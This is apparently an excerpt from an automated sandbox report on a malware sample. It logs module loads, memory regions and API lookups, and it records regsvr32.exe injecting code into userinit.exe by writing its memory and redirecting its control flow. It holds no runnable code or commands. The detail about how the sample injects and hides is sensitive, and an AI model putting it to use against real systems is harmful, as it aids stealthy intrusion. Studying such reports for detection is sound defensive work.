Create	C:\ProgramData\tempa\marxvxinhhmg.gif	desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ		1	Fn
Read	C:\ProgramData\tempa\marxvxinhhmg.gif	size = 1097216, size_out = 1097216		1	Fn

Registry (6)

»

Operation	Key	Additional Information	Count	Logfile
Open Key	HKEY_CURRENT_USER\Software\Borland\Locales	-	2	Fn
Open Key	HKEY_LOCAL_MACHINE\Software\Borland\Locales	-	2	Fn
Open Key	HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	-	2	Fn

Module (191)

»

Operation	Module	Additional Information	Count	Logfile
Load	C:\Windows\System32\userinit.ENU	base_address = 0x0	1	Fn
Load	C:\Windows\System32\userinit.EN	base_address = 0x0	1	Fn
Load	olepro32.dll	base_address = 0x6d770000	1	Fn
Load	netapi32.dll	base_address = 0x73b10000	1	Fn
Load	OLEAUT32.DLL	base_address = 0x758f0000	1	Fn
Get Handle	private_0x0000000000400000	base_address = 0x400000	1	Fn
Get Handle	c:\windows\system32\kernel32.dll	base_address = 0x75370000	13	Fn
Get Handle	c:\windows\system32\oleaut32.dll	base_address = 0x758f0000	2	Fn
Get Handle	c:\windows\system32\user32.dll	base_address = 0x757b0000	6	Fn
Get Handle	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	base_address = 0x6d7b0000	2	Fn
Get Handle	c:\windows\system32\ole32.dll	base_address = 0x76a20000	1	Fn
Get Handle	netapi32.dll	base_address = 0x0	1	Fn
Get Handle	c:\windows\system32\netapi32.dll	base_address = 0x73b10000	1	Fn
Get Handle	c:\windows\system32\advapi32.dll	base_address = 0x76da0000	19	Fn
Get Filename	private_0x0000000000400000	process_name = c:\windows\system32\userinit.exe, file_name_orig = C:\Windows\System32\userinit.exe, size = 261	1	Fn
Get Filename	-	process_name = c:\windows\system32\userinit.exe, file_name_orig = C:\Windows\System32\userinit.exe, size = 261	1	Fn
Get Filename	private_0x0000000000400000	process_name = c:\windows\system32\userinit.exe, file_name_orig = C:\Windows\System32\userinit.exe, size = 256	1	Fn
Get Filename	-	process_name = c:\windows\system32\userinit.exe, file_name_orig = lî, size = 261	1	Fn
Get Filename	C:\Windows\System32\userinit.EN	process_name = c:\windows\system32\userinit.exe, file_name_orig = C:\Windows\System32\userinit.exe, size = 261	1	Fn
Get Filename	C:\Windows\System32\userinit.EN	process_name = c:\windows\system32\userinit.exe, file_name_orig = C:\Windows\System32\userinit.exe, size = 256	1	Fn
Get Filename	netapi32.dll	process_name = c:\windows\system32\userinit.exe, file_name_orig = C:\Windows\System32\userinit.exe, size = 261	12	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GetDiskFreeSpaceExA, address_out = 0x753ff46f	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VariantChangeTypeEx, address_out = 0x758f4c28	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarNeg, address_out = 0x7596c802	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarNot, address_out = 0x7596ec66	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarAdd, address_out = 0x75915934	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarSub, address_out = 0x7596d332	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarMul, address_out = 0x7596dbd4	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarDiv, address_out = 0x7596e405	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarIdiv, address_out = 0x7596f00a	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarMod, address_out = 0x7596f15e	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarAnd, address_out = 0x75915a98	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarOr, address_out = 0x7596ecfa	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarXor, address_out = 0x7596ee2e	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarCmp, address_out = 0x7590b0dc	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarI4FromStr, address_out = 0x75906fab	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarR4FromStr, address_out = 0x759101a0	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarR8FromStr, address_out = 0x7590699e	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarDateFromStr, address_out = 0x75916ba7	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarCyFromStr, address_out = 0x75936c12	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarBoolFromStr, address_out = 0x7590dbd1	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarBstrFromCy, address_out = 0x75917fdc	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarBstrFromDate, address_out = 0x75907a2a	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarBstrFromBool, address_out = 0x75910355	2	Fn
Get Address	c:\windows\system32\user32.dll	function = GetMonitorInfoA, address_out = 0x757bc34e	2	Fn
Get Address	c:\windows\system32\user32.dll	function = GetSystemMetrics, address_out = 0x757c67cf	2	Fn
Get Address	c:\windows\system32\user32.dll	function = EnumDisplayMonitors, address_out = 0x757c34a3	2	Fn
Get Address	c:\windows\system32\user32.dll	function = AnimateWindow, address_out = 0x757e0620	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = InitializeFlatSB, address_out = 0x6d7e266f	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = UninitializeFlatSB, address_out = 0x6d7e2542	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_GetScrollProp, address_out = 0x6d7e1d29	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_SetScrollProp, address_out = 0x6d7e238d	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_EnableScrollBar, address_out = 0x6d7e20c9	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_ShowScrollBar, address_out = 0x6d7e1fdb	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_GetScrollRange, address_out = 0x6d7e1e8d	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_GetScrollInfo, address_out = 0x6d7e1f0f	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_GetScrollPos, address_out = 0x6d7e1ccd	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_SetScrollPos, address_out = 0x6d7e216d	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_SetScrollInfo, address_out = 0x6d7e22be	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_SetScrollRange, address_out = 0x6d7e21e2	2	Fn
Get Address	c:\windows\system32\user32.dll	function = SetLayeredWindowAttributes, address_out = 0x757ba6dc	2	Fn
Get Address	c:\windows\system32\ole32.dll	function = CoCreateInstanceEx, address_out = 0x76a69d4e	1	Fn
Get Address	c:\windows\system32\ole32.dll	function = CoInitializeEx, address_out = 0x76a609ad	1	Fn
Get Address	c:\windows\system32\ole32.dll	function = CoAddRefServerProcess, address_out = 0x76a83cf3	1	Fn
Get Address	c:\windows\system32\ole32.dll	function = CoReleaseServerProcess, address_out = 0x76a84314	1	Fn
Get Address	c:\windows\system32\ole32.dll	function = CoResumeClassObjects, address_out = 0x76a2ea02	1	Fn
Get Address	c:\windows\system32\ole32.dll	function = CoSuspendClassObjects, address_out = 0x76a8bb02	1	Fn
Get Address	c:\windows\system32\olepro32.dll	function = OleCreatePropertyFrame, address_out = 0x6d7720ea	1	Fn
Get Address	c:\windows\system32\olepro32.dll	function = OleCreateFontIndirect, address_out = 0x6d7720b7	1	Fn
Get Address	c:\windows\system32\olepro32.dll	function = OleCreatePictureIndirect, address_out = 0x6d7720c8	1	Fn
Get Address	c:\windows\system32\olepro32.dll	function = OleLoadPicture, address_out = 0x6d7720d9	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GetVersionExA, address_out = 0x753c3861	1	Fn
Get Address	c:\windows\system32\netapi32.dll	function = NetServerGetInfo, address_out = 0x74f13cfa	1	Fn
Get Address	c:\windows\system32\netapi32.dll	function = NetApiBufferFree, address_out = 0x73b013d2	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = LocalFree, address_out = 0x753bca64	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GetCurrentThread, address_out = 0x753c3351	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = OpenThreadToken, address_out = 0x76db432c	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GetCurrentProcess, address_out = 0x753bcdcf	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = OpenProcessToken, address_out = 0x76db4304	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = MapGenericMask, address_out = 0x76dc7a73	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetTokenInformation, address_out = 0x76db431c	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GetLastError, address_out = 0x753bbf00	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = HeapAlloc, address_out = 0x76f72dd6	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = HeapFree, address_out = 0x753bbbd0	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = CloseHandle, address_out = 0x753bca7c	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSecurityInfo, address_out = 0x76dab3e4	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSecurityDescriptorControl, address_out = 0x76daaddf	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSecurityDescriptorOwner, address_out = 0x76daadf7	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSecurityDescriptorGroup, address_out = 0x76daae27	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSecurityDescriptorDacl, address_out = 0x76db41a6	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = IsValidAcl, address_out = 0x76da8523	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetAce, address_out = 0x76db45f0	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSecurityDescriptorSacl, address_out = 0x76db4608	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetLengthSid, address_out = 0x76db413b	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GlobalAlloc, address_out = 0x753b9ce1	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = InitializeAcl, address_out = 0x76db45cd	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = SetLastError, address_out = 0x753bbb08	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSidSubAuthorityCount, address_out = 0x76db0e0c	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSidIdentifierAuthority, address_out = 0x76daa935	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSidSubAuthority, address_out = 0x76db0e24	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = AddAce, address_out = 0x76daae0f	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GlobalFree, address_out = 0x753b9cf9	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = SetSecurityInfo, address_out = 0x76da9edf	1	Fn

Window (3)

»

Operation	Window Name	Additional Information	Count	Logfile
Create	userinit	class_name = TApplication, wndproc_parameter = 0	1	Fn
Find	marxvxinhhm0131	-	1	Fn
Set Attribute	userinit	class_name = TApplication, index = 18446744073709551612, new_long = 397295	1	Fn

Keyboard (6)

»

Operation	Additional Information	Count	Logfile
Get Info	type = 0, result_out = 4	2	Fn
Get Info	type = KB_LOCALE_ID, os_tid = 0, result_out = 67699721	2	Fn
Get Info	type = KB_LOCALE_ID	2	Fn

System (10)

»

Operation	Additional Information	Count	Logfile
Get Computer Name	result_out = CRH2YWU7	1	Fn
Get Info	type = Operating System	6	Fn
Get Info	type = Operating System	3	Fn

Process #40: userinit.exe

0

»

Information	Value
ID	#40
File Name	c:\windows\system32\userinit.exe
Command Line	"C:\Windows\System32\userinit.exe"
Initial Working Directory	C:\Windows\system32\
Monitor	Start Time: 00:02:27, Reason: Child Process
Unmonitor	End Time: 00:02:28, Reason: Self Terminated
Monitor Duration	00:00:01
Remark	No high level activity detected in monitored regions

OS Process Information

»

Information	Value
PID	0x180
Parent PID	0xf18 (c:\windows\system32\regsvr32.exe)
Is Created or Modified Executable
Integrity Level	High (Elevated)
Username	CRH2YWU7\EEBsYm5
Enabled Privileges	SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs	0x 480

Process #41: userinit.exe

222

0

»

Information	Value
ID	#41
File Name	c:\windows\system32\userinit.exe
Command Line	"C:\Windows\System32\userinit.exe"
Initial Working Directory	C:\Windows\system32\
Monitor	Start Time: 00:02:27, Reason: Child Process
Unmonitor	End Time: 00:02:30, Reason: Self Terminated
Monitor Duration	00:00:03

OS Process Information

»

Information	Value
PID	0x734
Parent PID	0xf0c (c:\windows\system32\regsvr32.exe)
Is Created or Modified Executable
Integrity Level	High (Elevated)
Username	CRH2YWU7\EEBsYm5
Enabled Privileges	SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs	0x 524 0x 2AC 0x 548

Region

»

Name	Start VA	End VA	Type	Permissions	Actions
private_0x0000000000010000	0x00010000	0x0002ffff	Private Memory	rw	-
pagefile_0x0000000000010000	0x00010000	0x0001ffff	Pagefile Backed Memory	rw	-
private_0x0000000000020000	0x00020000	0x00020fff	Private Memory	rw	-
pagefile_0x0000000000030000	0x00030000	0x00033fff	Pagefile Backed Memory	r	-
pagefile_0x0000000000040000	0x00040000	0x00040fff	Pagefile Backed Memory	r	-
locale.nls	0x00050000	0x000b6fff	Memory Mapped File	r	-
private_0x00000000000c0000	0x000c0000	0x000c0fff	Private Memory	rw	-
private_0x00000000000d0000	0x000d0000	0x000d0fff	Private Memory	rwx	-
pagefile_0x00000000000e0000	0x000e0000	0x000e6fff	Pagefile Backed Memory	r	-
private_0x00000000000f0000	0x000f0000	0x000fffff	Private Memory	rw	-
pagefile_0x0000000000100000	0x00100000	0x00101fff	Pagefile Backed Memory	rw	-
oleaccrc.dll	0x00110000	0x00110fff	Memory Mapped File	r	-
private_0x0000000000120000	0x00120000	0x00120fff	Private Memory	rwx	-
pagefile_0x0000000000130000	0x00130000	0x00131fff	Pagefile Backed Memory	r	-
private_0x0000000000150000	0x00150000	0x0018ffff	Private Memory	rw	-
pagefile_0x0000000000190000	0x00190000	0x00257fff	Pagefile Backed Memory	r	-
pagefile_0x0000000000260000	0x00260000	0x0033efff	Pagefile Backed Memory	r	-
private_0x0000000000350000	0x00350000	0x0035ffff	Private Memory	rw	-
private_0x0000000000360000	0x00360000	0x003dffff	Private Memory	rw	-
userinit.exe	0x003f0000	0x003f8fff	Memory Mapped File	rwx	-
private_0x0000000000400000	0x00400000	0x00462fff	Private Memory	rwx	-
pagefile_0x0000000000470000	0x00470000	0x00570fff	Pagefile Backed Memory	r	-
private_0x0000000000580000	0x00580000	0x00600fff	Private Memory	rw	-
private_0x0000000000580000	0x00580000	0x00604fff	Private Memory	rw	-
private_0x0000000000580000	0x00580000	0x00608fff	Private Memory	rw	-
private_0x0000000000580000	0x00580000	0x0060cfff	Private Memory	rw	-
private_0x0000000000610000	0x00610000	0x0070ffff	Private Memory	rw	-
pagefile_0x0000000000710000	0x00710000	0x0130ffff	Pagefile Backed Memory	r	-
private_0x0000000001310000	0x01310000	0x0140ffff	Private Memory	-	-
private_0x0000000001410000	0x01410000	0x015effff	Private Memory	rw	-
private_0x0000000001410000	0x01410000	0x014dffff	Private Memory	rw	-
private_0x0000000001410000	0x01410000	0x01492fff	Private Memory	rw	-
private_0x0000000001410000	0x01410000	0x01496fff	Private Memory	rw	-
private_0x0000000001410000	0x01410000	0x0149afff	Private Memory	rw	-
private_0x0000000001410000	0x01410000	0x0149efff	Private Memory	rw	-
private_0x0000000001430000	0x01430000	0x0146ffff	Private Memory	rw	-
private_0x00000000014a0000	0x014a0000	0x014dffff	Private Memory	rw	-
private_0x00000000014e0000	0x014e0000	0x01570fff	Private Memory	rw	-
private_0x00000000014e0000	0x014e0000	0x01574fff	Private Memory	rw	-
private_0x00000000014e0000	0x014e0000	0x01578fff	Private Memory	rw	-
private_0x00000000014e0000	0x014e0000	0x0157cfff	Private Memory	rw	-
private_0x00000000014e0000	0x014e0000	0x01580fff	Private Memory	rw	-
private_0x00000000014e0000	0x014e0000	0x01584fff	Private Memory	rw	-
private_0x00000000014e0000	0x014e0000	0x01588fff	Private Memory	rw	-
private_0x00000000014e0000	0x014e0000	0x0158cfff	Private Memory	rw	-
private_0x00000000014e0000	0x014e0000	0x01590fff	Private Memory	rw	-
private_0x00000000014e0000	0x014e0000	0x01594fff	Private Memory	rw	-
private_0x00000000014e0000	0x014e0000	0x01598fff	Private Memory	rw	-
private_0x00000000014e0000	0x014e0000	0x0159cfff	Private Memory	rw	-
private_0x00000000014e0000	0x014e0000	0x015a0fff	Private Memory	rw	-
private_0x00000000014e0000	0x014e0000	0x015a4fff	Private Memory	rw	-
private_0x00000000014e0000	0x014e0000	0x015a8fff	Private Memory	rw	-
private_0x00000000014e0000	0x014e0000	0x015acfff	Private Memory	rw	-
private_0x00000000015b0000	0x015b0000	0x015effff	Private Memory	rw	-
staticcache.dat	0x015f0000	0x01f1ffff	Memory Mapped File	r	-
pagefile_0x0000000001f20000	0x01f20000	0x02312fff	Pagefile Backed Memory	r	-
private_0x0000000002320000	0x02320000	0x0242cfff	Private Memory	rw	-
private_0x0000000002430000	0x02430000	0x0252ffff	Private Memory	rw	-
private_0x0000000002530000	0x02530000	0x0272ffff	Private Memory	rw	-
private_0x0000000002730000	0x02730000	0x027c2fff	Private Memory	rw	-
private_0x0000000002730000	0x02730000	0x027c6fff	Private Memory	rw	-
private_0x0000000002730000	0x02730000	0x027cafff	Private Memory	rw	-
private_0x0000000002730000	0x02730000	0x027cefff	Private Memory	rw	-
private_0x0000000002730000	0x02730000	0x027d2fff	Private Memory	rw	-
private_0x0000000002730000	0x02730000	0x027d6fff	Private Memory	rw	-
private_0x0000000002730000	0x02730000	0x027dafff	Private Memory	rw	-
private_0x0000000002730000	0x02730000	0x027defff	Private Memory	rw	-
private_0x0000000002730000	0x02730000	0x027e2fff	Private Memory	rw	-
private_0x0000000002730000	0x02730000	0x027e6fff	Private Memory	rw	-
private_0x0000000002730000	0x02730000	0x027eafff	Private Memory	rw	-
private_0x0000000002730000	0x02730000	0x027eefff	Private Memory	rw	-
private_0x0000000002730000	0x02730000	0x027f2fff	Private Memory	rw	-
private_0x0000000002730000	0x02730000	0x027f6fff	Private Memory	rw	-
private_0x0000000002730000	0x02730000	0x027fafff	Private Memory	rw	-
private_0x0000000002730000	0x02730000	0x027fefff	Private Memory	rw	-
private_0x0000000002730000	0x02730000	0x02804fff	Private Memory	rw	-
private_0x0000000002730000	0x02730000	0x02808fff	Private Memory	rw	-
private_0x0000000002730000	0x02730000	0x0280cfff	Private Memory	rw	-
private_0x0000000002730000	0x02730000	0x02812fff	Private Memory	rw	-
private_0x0000000002730000	0x02730000	0x02816fff	Private Memory	rw	-
private_0x0000000002730000	0x02730000	0x0281afff	Private Memory	rw	-
private_0x0000000002730000	0x02730000	0x0281efff	Private Memory	rw	-
private_0x0000000002730000	0x02730000	0x02824fff	Private Memory	rw	-
private_0x0000000002730000	0x02730000	0x02828fff	Private Memory	rw	-
private_0x0000000002730000	0x02730000	0x0282cfff	Private Memory	rw	-
private_0x0000000002730000	0x02730000	0x02832fff	Private Memory	rw	-
private_0x0000000002730000	0x02730000	0x02836fff	Private Memory	rw	-
private_0x0000000002730000	0x02730000	0x0283afff	Private Memory	rw	-
private_0x0000000002730000	0x02730000	0x0283ffff	Private Memory	-	-
private_0x0000000002800000	0x02800000	0x028d0fff	Private Memory	rw	-
private_0x0000000002810000	0x02810000	0x028e6fff	Private Memory	rw	-
private_0x0000000002810000	0x02810000	0x028eafff	Private Memory	rw	-
private_0x0000000002810000	0x02810000	0x028eefff	Private Memory	rw	-
private_0x0000000002820000	0x02820000	0x02904fff	Private Memory	rw	-
private_0x0000000002820000	0x02820000	0x02908fff	Private Memory	rw	-
private_0x0000000002820000	0x02820000	0x0290cfff	Private Memory	rw	-
private_0x0000000002820000	0x02820000	0x02910fff	Private Memory	rw	-
private_0x0000000002830000	0x02830000	0x02926fff	Private Memory	rw	-
private_0x0000000002830000	0x02830000	0x0292afff	Private Memory	rw	-
private_0x0000000002830000	0x02830000	0x0292efff	Private Memory	rw	-
private_0x0000000002840000	0x02840000	0x02944fff	Private Memory	rw	-
private_0x0000000002840000	0x02840000	0x02948fff	Private Memory	rw	-
private_0x0000000002840000	0x02840000	0x0294cfff	Private Memory	rw	-
private_0x00000000028e0000	0x028e0000	0x029b2fff	Private Memory	rw	-
private_0x00000000028f0000	0x028f0000	0x029d0fff	Private Memory	rw	-
private_0x0000000002920000	0x02920000	0x02a12fff	Private Memory	rw	-
private_0x0000000002930000	0x02930000	0x02a30fff	Private Memory	rw	-
private_0x0000000002950000	0x02950000	0x02a62fff	Private Memory	rwx	-
private_0x0000000002a70000	0x02a70000	0x02b6ffff	Private Memory	-	-
private_0x0000000002bf0000	0x02bf0000	0x02ceffff	Private Memory	rw	-
sortdefault.nls	0x02cf0000	0x02fbefff	Memory Mapped File	r	-
comctl32.dll	0x6d720000	0x6d7a3fff	Memory Mapped File	rwx	-
olepro32.dll	0x6d820000	0x6d838fff	Memory Mapped File	rwx	-
oleacc.dll	0x71bf0000	0x71c2bfff	Memory Mapped File	rwx	-
dwmapi.dll	0x733b0000	0x733c2fff	Memory Mapped File	rwx	-
uxtheme.dll	0x736a0000	0x736dffff	Memory Mapped File	rwx	-
wkscli.dll	0x73af0000	0x73afefff	Memory Mapped File	rwx	-
netutils.dll	0x73b00000	0x73b08fff	Memory Mapped File	rwx	-
netapi32.dll	0x73b10000	0x73b20fff	Memory Mapped File	rwx	-
comctl32.dll	0x73e90000	0x7402dfff	Memory Mapped File	rwx	-
version.dll	0x745c0000	0x745c8fff	Memory Mapped File	rwx	-
srvcli.dll	0x74f10000	0x74f28fff	Memory Mapped File	rwx	-
msasn1.dll	0x750e0000	0x750ebfff	Memory Mapped File	rwx	-
crypt32.dll	0x751b0000	0x752ccfff	Memory Mapped File	rwx	-
kernelbase.dll	0x75320000	0x75369fff	Memory Mapped File	rwx	-
kernel32.dll	0x75370000	0x75443fff	Memory Mapped File	rwx	-
lpk.dll	0x754b0000	0x754b9fff	Memory Mapped File	rwx	-
iertutil.dll	0x754c0000	0x756bafff	Memory Mapped File	rwx	-
msvcrt.dll	0x75700000	0x757abfff	Memory Mapped File	rwx	-
user32.dll	0x757b0000	0x75878fff	Memory Mapped File	rwx	-
gdi32.dll	0x75880000	0x758cdfff	Memory Mapped File	rwx	-
sechost.dll	0x758d0000	0x758e8fff	Memory Mapped File	rwx	-
oleaut32.dll	0x758f0000	0x7597efff	Memory Mapped File	rwx	-
msctf.dll	0x759b0000	0x75a7bfff	Memory Mapped File	rwx	-
urlmon.dll	0x75a80000	0x75bb5fff	Memory Mapped File	rwx	-
usp10.dll	0x75bc0000	0x75c5cfff	Memory Mapped File	rwx	-
shlwapi.dll	0x768c0000	0x76916fff	Memory Mapped File	rwx	-
wininet.dll	0x76920000	0x76a14fff	Memory Mapped File	rwx	-
ole32.dll	0x76a20000	0x76b7bfff	Memory Mapped File	rwx	-
advapi32.dll	0x76da0000	0x76e3ffff	Memory Mapped File	rwx	-
imm32.dll	0x76e40000	0x76e5efff	Memory Mapped File	rwx	-
rpcrt4.dll	0x76e60000	0x76f00fff	Memory Mapped File	rwx	-
ntdll.dll	0x76f20000	0x7705bfff	Memory Mapped File	rwx	-
apisetschema.dll	0x77160000	0x77160fff	Memory Mapped File	rwx	-
pagefile_0x000000007f6f0000	0x7f6f0000	0x7f7effff	Pagefile Backed Memory	r	-
pagefile_0x000000007ffb0000	0x7ffb0000	0x7ffd2fff	Pagefile Backed Memory	r	-
private_0x000000007ffdb000	0x7ffdb000	0x7ffdbfff	Private Memory	rw	-
private_0x000000007ffdd000	0x7ffdd000	0x7ffddfff	Private Memory	rw	-
private_0x000000007ffde000	0x7ffde000	0x7ffdefff	Private Memory	rw	-
private_0x000000007ffdf000	0x7ffdf000	0x7ffdffff	Private Memory	rw	-
For performance reasons, the remaining 20 entries are omitted. The remaining entries can be found in flog.txt.

Injection Information

»

Injection Type	Source Process	Source Os Thread ID	Information	Count	Logfile
Modify Memory	#24: c:\windows\system32\regsvr32.exe	0xf10	address = 0x400000, size = 405504	1	Fn Data
Modify Memory	#24: c:\windows\system32\regsvr32.exe	0xf10	address = 0x7ffdb008, size = 4	1	Fn Data
Modify Control Flow	#24: c:\windows\system32\regsvr32.exe	0xf10	os_tid = 0x524, address = 0x76f67098	1	Fn

Host Behavior

File (2)

»

Operation	Filename	Additional Information	Success	Count	Logfile
Create	C:\ProgramData\tempa\marxvxinhhmg.gif	desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ		1	Fn
Read	C:\ProgramData\tempa\marxvxinhhmg.gif	size = 1097216, size_out = 1097216		1	Fn

Registry (6)

»

Operation	Key	Additional Information	Count	Logfile
Open Key	HKEY_CURRENT_USER\Software\Borland\Locales	-	2	Fn
Open Key	HKEY_LOCAL_MACHINE\Software\Borland\Locales	-	2	Fn
Open Key	HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	-	2	Fn

Module (191)

»

Operation	Module	Additional Information	Count	Logfile
Load	C:\Windows\System32\userinit.ENU	base_address = 0x0	1	Fn
Load	C:\Windows\System32\userinit.EN	base_address = 0x0	1	Fn
Load	olepro32.dll	base_address = 0x6d820000	1	Fn
Load	netapi32.dll	base_address = 0x73b10000	1	Fn
Load	OLEAUT32.DLL	base_address = 0x758f0000	1	Fn
Get Handle	private_0x0000000000400000	base_address = 0x400000	1	Fn
Get Handle	c:\windows\system32\kernel32.dll	base_address = 0x75370000	13	Fn
Get Handle	c:\windows\system32\oleaut32.dll	base_address = 0x758f0000	2	Fn
Get Handle	c:\windows\system32\user32.dll	base_address = 0x757b0000	6	Fn
Get Handle	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	base_address = 0x6d720000	2	Fn
Get Handle	c:\windows\system32\ole32.dll	base_address = 0x76a20000	1	Fn
Get Handle	netapi32.dll	base_address = 0x0	1	Fn
Get Handle	c:\windows\system32\netapi32.dll	base_address = 0x73b10000	1	Fn
Get Handle	c:\windows\system32\advapi32.dll	base_address = 0x76da0000	19	Fn
Get Filename	private_0x0000000000400000	process_name = c:\windows\system32\userinit.exe, file_name_orig = C:\Windows\System32\userinit.exe, size = 261	1	Fn
Get Filename	-	process_name = c:\windows\system32\userinit.exe, file_name_orig = C:\Windows\System32\userinit.exe, size = 261	1	Fn
Get Filename	private_0x0000000000400000	process_name = c:\windows\system32\userinit.exe, file_name_orig = C:\Windows\System32\userinit.exe, size = 256	1	Fn
Get Filename	-	process_name = c:\windows\system32\userinit.exe, file_name_orig = Lñ, size = 261	1	Fn
Get Filename	C:\Windows\System32\userinit.EN	process_name = c:\windows\system32\userinit.exe, file_name_orig = C:\Windows\System32\userinit.exe, size = 261	1	Fn
Get Filename	C:\Windows\System32\userinit.EN	process_name = c:\windows\system32\userinit.exe, file_name_orig = C:\Windows\System32\userinit.exe, size = 256	1	Fn
Get Filename	netapi32.dll	process_name = c:\windows\system32\userinit.exe, file_name_orig = C:\Windows\System32\userinit.exe, size = 261	12	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GetDiskFreeSpaceExA, address_out = 0x753ff46f	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VariantChangeTypeEx, address_out = 0x758f4c28	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarNeg, address_out = 0x7596c802	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarNot, address_out = 0x7596ec66	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarAdd, address_out = 0x75915934	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarSub, address_out = 0x7596d332	2	Fn
